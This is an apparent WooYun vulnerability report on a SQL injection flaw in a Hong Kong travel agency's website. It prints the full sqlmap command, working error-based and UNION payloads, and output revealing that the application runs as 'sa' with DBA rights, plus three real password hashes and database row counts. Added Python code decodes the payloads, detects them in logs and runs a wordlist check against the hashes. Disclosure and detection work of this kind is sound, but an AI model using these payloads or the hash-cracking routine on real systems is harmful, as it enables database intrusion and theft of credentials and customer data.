Vulnerability summary
Followers: 24
Title: Any Tours (天洋旅遊) has a SQL injection flaw (DBA privileges / sa password hash exposed / 370,000 user IP records exposed) (Hong Kong)
Submitted: 2015-11-10 09:55
Fixed: 2016-01-11 15:32
Published: 2016-01-11 15:32
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 10
Status: Handed to a third-party partner organisation (hkcert, Hong Kong Computer Emergency Response Team Coordination Centre) for handling
Tags: none
Vulnerability details
Disclosure status:
2015-11-10: Details sent to the vendor; awaiting the vendor's response
2015-11-20: Vendor confirmed; details visible to the vendor only
2015-11-30: Details opened to core white hats and experts in the relevant field
2015-12-10: Details opened to regular white hats
2015-12-20: Details opened to intern white hats
2016-01-11: Details made public
Brief description: Any Tours's main focus of business activities are corporate business travel arrangements, full travel management and support for M.I.C.E. & events, interest/leisure groups, incentive travel for Hong Kong, China & Macau inbound/outbound, especially special interest groups such as sports (rugby, soccer, golf, Formula One Grand Prix) & student study exchange groups. Any Tours has also invested in the training & development of an experienced, energetic and service-minded workforce. Our team members create, design and build the most exclusive itineraries catering to our clients' needs, and they are the cornerstone of creating the magic by providing quality, creativity, innovation and integrity with their great talent, passion and dedication. The company network extends over many countries and has an active working relationship with like-minded clients and travel industry partners from all over the world. Any Tours provides real-time, easy-to-access online worldwide air ticketing and hotel bookings with full travel information and e-commerce capabilities. Having had a presence on the worldwide web since 1997, Any Tours has secured a great place in the e-commerce business of the 21st century and is aiming to provide high and easy accessibility to worldwide & automated travel services for clients' and travel partners' convenience 24 x 7, around the clock. Our key words when dealing with our partners & clients are taking personal responsibility for providing high-quality services & products with efficiency, reliability and satisfaction with trust.
Details:
Injection point: http://**.**.**.**/tch/Hotel/search/?action=city&code=TYO (GET parameter `code`)

Command used (sqlmap, limited with --technique=EU to the error-based and UNION techniques; the remaining switches enumerate the current login, its DBA status, all logins, their password hashes and per-table row counts):
python sqlmap.py -u "http://**.**.**.**/tch/Hotel/search/?action=city&code=TYO" -p code --technique=EU --random-agent --batch --current-user --is-dba --users --passwords --count

Largest table in the application database (the full counts are in the proof section):
Database: Anytours
+------------------------------------------------------+---------+
| Table                                                | Entries |
+------------------------------------------------------+---------+
| dbo.IpList                                           | 369232  |
+------------------------------------------------------+---------+
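Added example, not code from the original report or from sqlmap: the two payloads sqlmap used against `code` (reproduced from the proof section) are decoded here to show the mechanics behind `--technique=EU`. The error-based probe only works because the application echoed the SQL Server error text back into the page; `CONVERT(INT, '<text>')` fails with "Conversion failed when converting the varchar value '...' to data type int." and the failing value, wrapped in two five-character boundary strings, is lifted from that message. The UNION probe appends one row carrying the same boundaries. Both use `CHAR()` chains so the markers survive quoting. The log lines and their timestamps are constructed; the detection regex is a minimal one written for this example.

```python
"""Decode the sqlmap payloads from this report and flag them in web logs."""
import re
from urllib.parse import quote, unquote_plus

# The two payload values for `code` copied from the proof section of the report.
ERROR_BASED = (
    "TYO' AND 8122=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113)"
    "+(SELECT (CASE WHEN (8122=8122) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(122)+CHAR(113))) AND 'sYzx'='sYzx"
)
UNION_BASED = (
    "-4812' UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113)+CHAR(90)"
    "+CHAR(116)+CHAR(115)+CHAR(103)+CHAR(103)+CHAR(88)+CHAR(110)+CHAR(83)+CHAR(117)"
    "+CHAR(102)+CHAR(119)+CHAR(106)+CHAR(87)+CHAR(106)+CHAR(66)+CHAR(114)+CHAR(83)"
    "+CHAR(100)+CHAR(100)+CHAR(97)+CHAR(78)+CHAR(107)+CHAR(67)+CHAR(98)+CHAR(117)"
    "+CHAR(71)+CHAR(109)+CHAR(65)+CHAR(117)+CHAR(89)+CHAR(65)+CHAR(89)+CHAR(90)"
    "+CHAR(119)+CHAR(118)+CHAR(105)+CHAR(119)+CHAR(74)+CHAR(113)+CHAR(101)+CHAR(113)"
    "+CHAR(120)+CHAR(107)+CHAR(122)+CHAR(113)-- -"
)

# sqlmap's boolean sub-select: (SELECT (CASE WHEN (a=b) THEN CHAR(x) ELSE CHAR(y) END))
CASE_RE = re.compile(
    r"\(SELECT \(CASE WHEN \((\d+)=(\d+)\) THEN CHAR\((\d+)\) ELSE CHAR\((\d+)\) END\)\)"
)
CHAR_RE = re.compile(r"CHAR\((\d+)\)")
# A CONVERT(INT, ...) or UNION ALL SELECT followed by a CHAR() chain in the same field.
PROBE_RE = re.compile(r"(CONVERT\(INT,|UNION ALL SELECT).*?CHAR\(\d+\)", re.IGNORECASE)


def fold_case(sql: str) -> str:
    """Resolve the CASE sub-select the way the DBMS would, leaving one CHAR() behind."""
    def pick(m: "re.Match[str]") -> str:
        left, right, then_code, else_code = m.groups()
        return f"CHAR({then_code if left == right else else_code})"
    return CASE_RE.sub(pick, sql)


def decode_char_chain(sql: str) -> str:
    """Concatenate every CHAR(n) in `sql` into the string SQL Server would build."""
    return "".join(chr(int(code)) for code in CHAR_RE.findall(fold_case(sql)))


def split_markers(decoded: str) -> tuple:
    """sqlmap brackets the extracted value with two 5-character boundary strings
    (here 'qjvbq' and 'qxkzq') so it can cut the value out of the error message
    "Conversion failed when converting the varchar value 'qjvbq1qxkzq' to data
    type int." or out of the page body for a UNION row."""
    if len(decoded) < 10:
        raise ValueError("too short to carry two sqlmap boundary strings")
    return decoded[:5], decoded[5:-5], decoded[-5:]


def is_sqlmap_probe(cs_uri_query: str) -> bool:
    """True when a URL-encoded query string (IIS cs-uri-query field) carries a probe."""
    return PROBE_RE.search(unquote_plus(cs_uri_query)) is not None


# Constructed IIS W3C-style lines: date time cs-method cs-uri-stem cs-uri-query sc-status.
# Timestamps and statuses are made up; the query values are the report's payloads.
SAMPLE_LOG = [
    "2015-11-10 01:55:12 GET /tch/Hotel/search/ action=city&code=TYO 200",
    "2015-11-10 01:55:13 GET /tch/Hotel/search/ action=city&code=" + quote(ERROR_BASED) + " 500",
    "2015-11-10 01:55:14 GET /tch/Hotel/search/ action=city&code=" + quote(UNION_BASED) + " 200",
]


def flag_probes(lines) -> list:
    """Return the indexes of log lines whose query field carries a sqlmap-style probe."""
    hits = []
    for i, line in enumerate(lines):
        fields = line.split(" ")
        if len(fields) >= 6 and is_sqlmap_probe(fields[4]):
            hits.append(i)
    return hits


if __name__ == "__main__":
    print(split_markers(decode_char_chain(ERROR_BASED)))
    print(split_markers(decode_char_chain(UNION_BASED)))
    print("probe lines:", flag_probes(SAMPLE_LOG))
```

The error-based marker decodes to `qjvbq` + `1` + `qxkzq`: the `1` is the CASE branch that fired because `8122=8122` is true, which is how sqlmap confirmed the injection before extracting anything. The UNION marker carries a 40-character random string between the same boundaries, which sqlmap looks for in the page body to confirm that its appended row is rendered.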
Proof:
---
Parameter: code (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: action=city&code=TYO' AND 8122=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (8122=8122) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(122)+CHAR(113))) AND 'sYzx'='sYzx

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: action=city&code=-4812' UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113)+CHAR(90)+CHAR(116)+CHAR(115)+CHAR(103)+CHAR(103)+CHAR(88)+CHAR(110)+CHAR(83)+CHAR(117)+CHAR(102)+CHAR(119)+CHAR(106)+CHAR(87)+CHAR(106)+CHAR(66)+CHAR(114)+CHAR(83)+CHAR(100)+CHAR(100)+CHAR(97)+CHAR(78)+CHAR(107)+CHAR(67)+CHAR(98)+CHAR(117)+CHAR(71)+CHAR(109)+CHAR(65)+CHAR(117)+CHAR(89)+CHAR(65)+CHAR(89)+CHAR(90)+CHAR(119)+CHAR(118)+CHAR(105)+CHAR(119)+CHAR(74)+CHAR(113)+CHAR(101)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(122)+CHAR(113)-- -
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
current user is DBA: True

database management system users [3]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] sa

database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x01006a67a63793d7beb1fc7e4e749a49c99976069fa2e2adbc9a
        header: 0x0100
        salt: 6a67a637
        mixedcase: 93d7beb1fc7e4e749a49c99976069fa2e2adbc9a
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x010021671bf66a2f269a3e02a454fa819b225e0a8d8daa68f932
        header: 0x0100
        salt: 21671bf6
        mixedcase: 6a2f269a3e02a454fa819b225e0a8d8daa68f932
[*] sa [1]:
    password hash: 0x01005175b4d432ed35abba033a7fa0874f4bd1b382b2a92d16df
        header: 0x0100
        salt: 5175b4d4
        mixedcase: 32ed35abba033a7fa0874f4bd1b382b2a92d16df

Row counts per table (sqlmap --count), listed as "table: entries" per database:

Database: ReportServerTempDB
  dbo.DBUpgradeHistory: 27

Database: TravelConnect_Log
  dbo.ReserveLog: 2438
  dbo.AirPricing: 1325
  dbo.UrPnrLog: 1121
  dbo.ErrLog: 45

Database: msdb
  dbo.backupfile: 596
  dbo.MSdbms_datatype_mapping: 493
  dbo.sysdatatypemappings: 493
  dbo.MSdbms_map: 374
  dbo.backupfilegroup: 298
  dbo.backupmediafamily: 298
  dbo.backupmediaset: 298
  dbo.backupset: 298
  dbo.MSdatatype_mappings: 260
  dbo.sysjobhistory: 200
  dbo.MSdbms_datatype: 180
  dbo.sysmaintplan_log: 90
  dbo.sysmaintplan_logdetail: 90
  dbo.syspolicy_facet_events: 84
  dbo.sysutility_mi_smo_properties_to_collect_internal: 84
  dbo.syspolicy_management_facets: 83
  dbo.sysutility_ucp_policy_target_conditions: 24
  dbo.sysutility_ucp_policy_target_conditions_internal: 24
  dbo.syscategories: 21
  dbo.sysutility_ucp_configuration: 13
  dbo.sysutility_ucp_configuration_internal: 13
  dbo.syssubsystems: 12
  dbo.sysutility_ucp_policy_check_conditions: 12
  dbo.sysutility_ucp_policy_check_conditions_internal: 12
  dbo.sysschedules: 9
  dbo.sysschedules_localserver_view: 9
  dbo.sysssispackages: 9
  dbo.MSdbms: 8
  dbo.sysutility_ucp_supported_object_types_internal: 8
  dbo.sysmail_configuration: 7
  dbo.syscollector_collection_items: 6
  dbo.syscollector_collection_items_internal: 6
  dbo.syscollector_config_store: 5
  dbo.syscollector_config_store_internal: 5
  dbo.sysmanagement_shared_server_groups: 5
  dbo.sysmanagement_shared_server_groups_internal: 5
  dbo.sysutility_mi_smo_objects_to_collect_internal: 5
  dbo.restorefile: 4
  dbo.syscollector_collection_sets: 4
  dbo.syscollector_collection_sets_internal: 4
  dbo.syscollector_collector_types: 4
  dbo.syscollector_collector_types_internal: 4
  dbo.sysjobsteps: 4
  dbo.syspolicy_configuration: 4
  dbo.syspolicy_configuration_internal: 4
  dbo.sysssispackagefolders: 4
  dbo.sysdtscategories: 3
  dbo.restorefilegroup: 2
  dbo.restorehistory: 2
  dbo.sysjobactivity: 2
  dbo.sysjobs: 2
  dbo.sysjobs_view: 2
  dbo.sysjobschedules: 2
  dbo.sysjobservers: 2
  dbo.sysutility_ucp_policy_configuration: 2
  dbo.sysdbmaintplans: 1
  dbo.sysmail_servertype: 1
  dbo.sysmaintplan_plans: 1
  dbo.sysmaintplan_subplans: 1
  dbo.sysoriginatingservers_view: 1
  dbo.syssessions: 1
  dbo.systargetservers_view: 1
  dbo.sysutility_mi_configuration: 1
  dbo.sysutility_ucp_processing_state_internal: 1
  dbo.sysutility_ucp_utility_space_utilization: 1

Database: Anytours
  dbo.IpList: 369232
  dbo.Shopcart_CartListD: 334967
  dbo.Hotel_Item_Links_CHT: 120780
  dbo.tBookingOrderD2: 116622
  dbo.Hotel_Item_RmCategory_CHT: 98821
  dbo.Request_Value: 79377
  dbo.Hotel_Item_Facilities_CHT: 72004
  dbo.Hotel_Item_RmFacilities_CHT: 53429
  dbo.Hotel_Item_Report_CHT: 48752
  dbo.sGalileoLog: 45412
  dbo.Hotel_Item_RoomType_CHT: 40925
  dbo.Request_Passenger: 20280
  dbo.an2idcity: 16913
  dbo.GTA_XMLRequestErrorLog: 15834
  dbo.Hotel_Item_Location_CHT: 11361
  dbo.Shopcart_CartListH: 9458
  dbo.Fare_mCityPort: 9286
  dbo.Hotel_Item_CHT: 8624
  dbo.Airfare_City: 6563
  dbo.tBookingOrderD_AirfarePax: 6048
  dbo.Airfare_Airport: 5437
  dbo.tPaymentRecoed: 4003
  dbo.mUser: 3903
  dbo.tBookingOrderH: 3362
  dbo.sRecLog: 3306
  dbo.tBookingOrderEmailRecord: 2152
  dbo.mAirfare: 1363
  dbo.Fare_FareSheet_Segment_Flight: 869
  dbo.Hotel_Area: 809
  dbo.Airfare_Airline: 795
  dbo.tBooking_ErrorRecord: 488
  dbo.tBookingOrderD_RoomPax: 392
  dbo.an2idairline: 324
  dbo.iSecurityLevel: 281
  dbo.iPackageGroup: 261
  dbo.Airfare_Country: 251
  dbo.CountryISO: 249
  dbo.an2idcountry: 248
  dbo.GTA_ASynchronousResponse: 240
  dbo.Package_City: 237
  dbo.IpBlockCountry: 236
  dbo.User_TelCountryCode: 233
  dbo.Fare_mCountry: 227
  dbo.AirfareMarkUpPriceList: 181
  dbo.Hotel_Country: 173
  dbo.Insurance_Destination: 173
  dbo.tBookingOrderD_RoomDesc: 112
  dbo.Package_Carrier: 62
  dbo.LinkMap: 56
  dbo.mForm: 40
  dbo.News: 36
  dbo.Advertisement: 31
  dbo.Insurance_CodeList: 30
  dbo.Airfare_ExcludeAirline: 29
  dbo.an2idfareclass: 29
  dbo.Airfare_Class: 26
  dbo.Package_Country: 22
  dbo.Cruise_CruiseLine: 19
  dbo.Insurance_PlanFee: 19
  dbo.Package_Activity: 15
  dbo.HotelMarkUpPriceList: 13
  dbo.Cruise_Country: 12
  dbo.ApiRecord: 11
  dbo.AdvertisementType: 10
  dbo.Hotel_DectinationRanking: 10
  dbo.Package_DectinationRanking: 10
  dbo.mOperator_Login: 8
  dbo.Hotel_RoomType: 6
  dbo.Cruise_CruiseLineRanking: 5
  dbo.Cruise_DurationRanking: 5
  dbo.Fare_FareSheet_CarrierRanking: 4
  dbo.Hotel_Currency: 4
  dbo.Shopcart_ItemType: 4
  dbo.Cruise_City: 3
  dbo.fSysNumberControl: 3
  dbo.ApiAuth: 2
  dbo.Cruise_Type: 2
  dbo.Hotel_CityGroup: 2
  dbo.Insurance_TravelInsuranceD: 2
  dbo.mContent: 2
  dbo.ShopCart_TempDS: 2
  dbo.Insurance_TravelInsuranceErrorLog: 1
  dbo.Insurance_TravelInsuranceH: 1

Database: ReportServer
  dbo.DBUpgradeHistory: 31
  dbo.ConfigurationInfo: 23
  dbo.Roles: 8
  dbo.PolicyUserRole: 4
  dbo.Users: 3
  dbo.Keys: 2
  dbo.Policies: 2
  dbo.SecData: 2
  dbo.ServerUpgradeHistory: 2
  dbo.Catalog: 1
  dbo.UpgradeInfo: 1

Database: master
  sys.dm_os_buffer_descriptors: 510030
  sys.dm_os_memory_objects: 485842
  sys.dm_os_memory_cache_entries: 111745
  sys.syscacheobjects: 107888
  sys.dm_exec_cached_plans: 107742
  sys.messages: 98318
  sys.sysmessages: 98318
  sys.dm_exec_query_stats: 54866
  sys.fulltext_system_stopwords: 15829
  sys.syscolumns: 12581
  sys.all_parameters: 7090
  sys.system_parameters: 7090
  sys.trace_subclass_values: 5366
  sys.all_columns: 5285
  sys.system_columns: 4626
  sys.trace_event_bindings: 4304
  sys.dm_os_ring_buffers: 3939
  sys.syscomments: 2997
  sys.dm_xe_object_columns: 2674
  dbo.spt_values: 2508
  sys.all_objects: 2002
  sys.sysobjects: 2002
  sys.system_objects: 1928
  sys.database_permissions: 1853
  sys.syspermissions: 1852
  sys.sysprotects: 1848
  sys.all_sql_modules: 1785
  sys.system_sql_modules: 1783
  sys.dm_xe_map_values: 1733
  sys.dm_os_virtual_address_dump: 1642
  sys.dm_os_performance_counters: 1116
  sys.sysperfinfo: 1116
  sys.system_internals_partition_columns: 822
  sys.columns: 659
  sys.dm_xe_objects: 542
  sys.dm_os_wait_stats: 490
  sys.dm_audit_actions: 454
  sys.spatial_reference_systems: 390
  sys.dm_db_index_usage_stats: 381
  sys.dm_exec_query_transformation_stats: 377
  sys.dm_os_memory_cache_clock_hands: 375
  sys.event_notification_event_types: 365
  sys.all_views: 354
  sys.system_views: 354
  sys.stats_columns: 352
  sys.dm_os_memory_clerks: 297
  sys.index_columns: 271
  sys.sysindexkeys: 271
  sys.trigger_event_types: 245
  sys.sysindexes: 202
  sys.stats: 194
  sys.dm_exec_procedure_stats: 182
  sys.trace_events: 180
  sys.dm_os_spinlock_stats: 175
  sys.dm_os_memory_cache_counters: 160
  sys.dm_os_latch_stats: 144
  sys.allocation_units: 128
  sys.system_internals_allocation_units: 128
  sys.dm_db_partition_stats: 116
  sys.indexes: 116
  sys.partitions: 116
  sys.system_internals_partitions: 116
  sys.syscharsets: 114
  sys.xml_schema_facets: 112
  sys.xml_schema_components: 99
  sys.dm_os_loaded_modules: 96
  sys.system_components_surface_area_configuration: 95
  sys.dm_audit_class_type_map: 83
  sys.xml_schema_types: 82
  sys.objects: 74
  sys.configurations: 70
  sys.sysconfigures: 70
  sys.syscurconfigs: 70
  sys.dm_os_threads: 69
  sys.trace_columns: 66
  sys.dm_os_worker_local_storage: 61
  sys.dm_os_workers: 61
  sys.dm_db_session_space_usage: 58
  sys.dm_db_task_space_usage: 58
  sys.dm_exec_sessions: 58
  sys.dm_os_memory_pools: 58
  sys.sysprocesses: 57
  INFORMATION_SCHEMA.COLUMNS: 50
  sys.dm_os_memory_cache_hash_tables: 50
  sys.fulltext_document_types: 50
  sys.fulltext_languages: 48
  sys.dm_exec_query_optimizer_info: 39
  sys.dm_os_tasks: 36
  sys.systypes: 34
  sys.types: 34
  sys.syslanguages: 33
  sys.dm_exec_connections: 30
  sys.dm_exec_requests: 29
  sys.dm_os_memory_node_access_stats: 24
  sys.dm_tran_locks: 23
  sys.server_permissions: 23
  sys.securable_classes: 22
  sys.server_principals: 22
  sys.syslockinfo: 22
  sys.trace_categories: 21
  sys.database_principals: 18
  sys.sysaltfiles: 18
  sys.sysusers: 18
  sys.xml_schema_component_placements: 18
  sys.dm_os_stacks: 16
  sys.master_files: 16
  INFORMATION_SCHEMA.SCHEMATA: 15
  sys.dm_db_missing_index_details: 15
  sys.dm_db_missing_index_group_stats: 15
  sys.dm_db_missing_index_groups: 15
  sys.dm_os_waiting_tasks: 15
  sys.schemas: 15
  sys.xml_schema_attributes: 15
  sys.service_message_types: 14
  sys.dm_db_script_level: 13
  sys.dm_os_schedulers: 13
  sys.syslogins: 13
  sys.service_contract_message_usages: 11
  sys.dm_tran_active_transactions: 10
  sys.dm_xe_session_event_actions: 10
  sys.server_event_session_actions: 10
  sys.crypt_properties: 8
  sys.database_mirroring: 8
  sys.database_recovery_status: 8
  sys.databases: 8
  sys.sysdatabases: 8
  sys.certificates: 7
  sys.dm_tran_database_transactions: 7
  INFORMATION_SCHEMA.TABLES: 6
  sys.dm_os_memory_brokers: 6
  sys.service_contracts: 6
  sys.tables: 6
  INFORMATION_SCHEMA.TABLE_PRIVILEGES: 5
  sys.dm_xe_session_events: 5
  sys.endpoints: 5
  sys.server_event_session_events: 5
  sys.server_role_members: 5
  sys.dm_exec_query_resource_semaphores: 4
  sys.dm_os_hosts: 4
  sys.dm_xe_packages: 4
  sys.internal_tables: 4
  dbo.MSreplication_options: 3
  sys.assembly_types: 3
  sys.dm_broker_queue_monitors: 3
  sys.dm_clr_properties: 3
  sys.dm_os_memory_nodes: 3
  sys.dm_os_nodes: 3
  sys.dm_xe_session_object_columns: 3
  sys.identity_columns: 3
  sys.login_token: 3
  sys.service_queue_usages: 3
  sys.service_queues: 3
  sys.services: 3
  sys.sql_logins: 3
  sys.type_assembly_usages: 3
  sys.xml_schema_namespaces: 3
  INFORMATION_SCHEMA.ROUTINES: 2
  sys.database_files: 2
  sys.database_role_members: 2
  sys.dm_exec_trigger_stats: 2
  sys.dm_fts_memory_pools: 2
  sys.dm_resource_governor_resource_pools: 2
  sys.dm_resource_governor_workload_groups: 2
  sys.key_encryptions: 2
  sys.procedures: 2
  sys.resource_governor_resource_pools: 2
  sys.resource_governor_workload_groups: 2
  sys.service_contract_usages: 2
  sys.sql_modules: 2
  sys.sysfiles: 2
  sys.sysmembers: 2
  sys.tcp_endpoints: 2
  dbo.spt_monitor: 1
  sys.assemblies: 1
  sys.assembly_files: 1
  sys.data_spaces: 1
  sys.default_constraints: 1
  sys.dm_db_file_space_usage: 1
  sys.dm_exec_background_job_queue_stats: 1
  sys.dm_fts_fdhosts: 1
  sys.dm_os_dispatcher_pools: 1
  sys.dm_os_dispatchers: 1
  sys.dm_os_process_memory: 1
  sys.dm_os_sys_info: 1
  sys.dm_os_sys_memory: 1
  sys.dm_resource_governor_configuration: 1
  sys.dm_tran_current_transaction: 1
  sys.dm_xe_session_targets: 1
  sys.dm_xe_sessions: 1
  sys.filegroups: 1
  sys.linked_logins: 1
  sys.resource_governor_configuration: 1
  sys.routes: 1
  sys.server_event_session_fields: 1
  sys.server_event_session_targets: 1
  sys.server_event_sessions: 1
  sys.servers: 1
  sys.symmetric_keys: 1
  sys.sysconstraints: 1
  sys.sysfilegroups: 1
  sys.sysoledbusers: 1
  sys.sysservers: 1
  sys.traces: 1
  sys.user_token: 1
  sys.via_endpoints: 1
  sys.xml_schema_collections: 1
  sys.xml_schema_model_groups: 1
  sys.xml_schema_wildcards: 1
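Two things in the output above matter more than the row counts. First, the web application connects as `sa`, so a single injectable parameter gives instance-wide access: the counts for msdb, master and the two ReportServer databases come from the same injection point as the Anytours data. Second, what sqlmap printed for `sa` is not the password but its stored hash. The three `0x0100...` values follow the scheme SQL Server has used since 2005: `0x0100 || salt (4 bytes) || SHA1(UTF-16LE(password) || salt)`, which sqlmap labels header / salt / mixedcase (hashcat mode 132, john format mssql05). With one SHA1 per guess and no work factor, a guessable `sa` password is as good as leaked. The following is an added example, not code from the report or from sqlmap: it splits a hash into those fields (checked against the `sa` hash printed above), rebuilds a hash for a known password, and runs an offline wordlist check. The demonstration password and wordlist are made up for the example; nothing here recovers the real `sa` password.

```python
"""Parse, rebuild and verify SQL Server 2005/2008 (0x0100, SHA1) login hashes."""
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Iterable, Optional

# The `sa` hash exactly as printed in the proof section above.
SA_HASH_FROM_REPORT = "0x01005175b4d432ed35abba033a7fa0874f4bd1b382b2a92d16df"

HEADER_2005 = b"\x01\x00"  # version tag of the SHA1-based scheme


@dataclass(frozen=True)
class MssqlHash:
    header: bytes   # always 0x0100 for this scheme
    salt: bytes     # 4 bytes, generated when the password was set
    digest: bytes   # 20-byte SHA1 output


def parse_mssql_hash(hex_value: str) -> MssqlHash:
    """Split a `0x0100<salt><sha1>` hash (as sqlmap prints it) into its fields."""
    cleaned = hex_value[2:] if hex_value.lower().startswith("0x") else hex_value
    raw = bytes.fromhex(cleaned)
    # 2 header + 4 salt + 20 digest bytes. SQL Server 2000 hashes are 46 bytes
    # (a second, upper-cased SHA1 follows) and 2012+ hashes start with 0x0200
    # and carry SHA-512; both are rejected here rather than mis-parsed.
    if len(raw) != 26 or raw[:2] != HEADER_2005:
        raise ValueError("not a SQL Server 2005/2008 (0x0100, SHA1) login hash")
    return MssqlHash(header=raw[:2], salt=raw[2:6], digest=raw[6:])


def make_mssql_hash(password: str, salt: Optional[bytes] = None) -> str:
    """Build the stored form for `password`, with a fresh random salt unless one is given."""
    salt = os.urandom(4) if salt is None else salt
    if len(salt) != 4:
        raise ValueError("salt must be exactly 4 bytes")
    digest = hashlib.sha1(password.encode("utf-16-le") + salt).digest()
    return "0x" + (HEADER_2005 + salt + digest).hex()


def verify_mssql_password(candidate: str, hex_value: str) -> bool:
    """True when `candidate` is the password behind `hex_value` (case-sensitive)."""
    parsed = parse_mssql_hash(hex_value)
    digest = hashlib.sha1(candidate.encode("utf-16-le") + parsed.salt).digest()
    return hmac.compare_digest(digest, parsed.digest)


def dictionary_check(hex_value: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline wordlist check against one hash; returns the matching word or None.
    Each guess costs one SHA1, which is why a leaked hash of a weak password
    is effectively a leaked password."""
    for word in candidates:
        if verify_mssql_password(word, hex_value):
            return word
    return None


if __name__ == "__main__":
    parsed = parse_mssql_hash(SA_HASH_FROM_REPORT)
    print("sa salt:", parsed.salt.hex(), "sha1:", parsed.digest.hex())
    # Constructed demonstration hash; the password below is made up for this example
    # and the salt is reused from the sa hash only to show the layout side by side.
    demo = make_mssql_hash("Tr0ub4dor&3", salt=bytes.fromhex("5175b4d4"))
    print("demo hash:", demo)
    print("verify correct password:", verify_mssql_password("Tr0ub4dor&3", demo))
    print("verify wrong case:", verify_mssql_password("tr0ub4dor&3", demo))
    print("wordlist hit:", dictionary_check(demo, ["password", "sa", "Tr0ub4dor&3"]))
```

The defensive reading of the same code: an administrator can run `dictionary_check` against the `sys.sql_logins` hashes of their own instance to find logins that would fall to a wordlist, and the fact that the application needed no more than `sa` to serve hotel searches is the configuration error that turned one injectable parameter into a full instance compromise.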
Remediation: (left blank in the original report)

Copyright notice: when republishing, credit the source: 路人甲 @ WooYun (乌云)
Vulnerability response
Vendor response: Severity: Medium
Vulnerability Rank: 5
Confirmed: 2015-11-20 15:17
Vendor reply: Referred to related parties.
Latest status: none